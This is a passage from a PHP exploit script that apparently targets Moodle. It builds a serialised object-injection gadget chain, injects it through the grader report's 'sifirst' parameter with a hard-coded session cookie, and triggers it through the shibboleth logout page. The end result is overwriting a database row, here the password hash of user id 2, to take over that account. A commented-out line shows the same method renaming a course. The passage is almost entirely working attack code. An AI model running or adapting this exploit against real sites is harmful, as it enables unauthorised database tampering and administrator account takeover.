key = new \core_availability\tree(); $lib_fb -> key -> children = new \core\dml\recordset_walk(); $lib_fb -> key -> children -> callback = "var_dump"; $lib_fb -> key -> children -> recordset = "123"; $lib_fb -> released = false; $base = new gradereport_overview_external(); $fb = new gradereport_singleview\local\ui\feedback(); $fb -> grade = new grade_grade(); $fb -> grade -> grade_item = new grade_item(); $fb -> grade -> grade_item -> calculation = "[[somestring"; $fb -> grade -> grade_item -> calculation_normalized = false; $fb -> grade -> grade_item -> table = $table; $fb -> grade -> grade_item -> id = $rowId; $fb -> grade -> grade_item -> $column = $value; $fb -> grade -> grade_item -> required_fields = array($column,'id'); $lib_fb -> caller = $fb; $arr = array($add_lib, $lib_fb,$base); //serializing the array $value = serialize($arr); // echo "\n============ Payload ===========\n"; // echo base64_encode($value); echo "\n [*] Inject Payload "; httpGet($url.'/grade/report/grader/index.php?id=1&sifirst=Testaaaaa|'.$value."Testbbbbbb|", $MoodleSession); echo "\n [*] Trigger Payload "; $data = ' ssss '; httpPost($url.'/auth/shibboleth/logout.php', $data, $MoodleSession, 1); } // Exploit Main $url = $argv[1]; $MoodleSession = 'v8grl591eoi47agqac0ddlsp3v'; // $table = "course"; //table exclude prefix mdl_ // $rowId = 3; // $column = 'fullname'; //column name to update // $value = "HackedCourse"; // update_table($url, $MoodleSession,$table,$rowId,$column, $value); $table = "user"; //table exclude prefix mdl_ $rowId = 2; // row id to insert into. 1 is guest $column = 'password'; //column name to update $newpassword = "Accounttakedover123"; $newpassword_hash = password_hash($newpassword, PASSWORD_DEFAULT); $value = $newpassword_hash; update_table($url, $MoodleSession,$table,$rowId,$column, $value); } ?>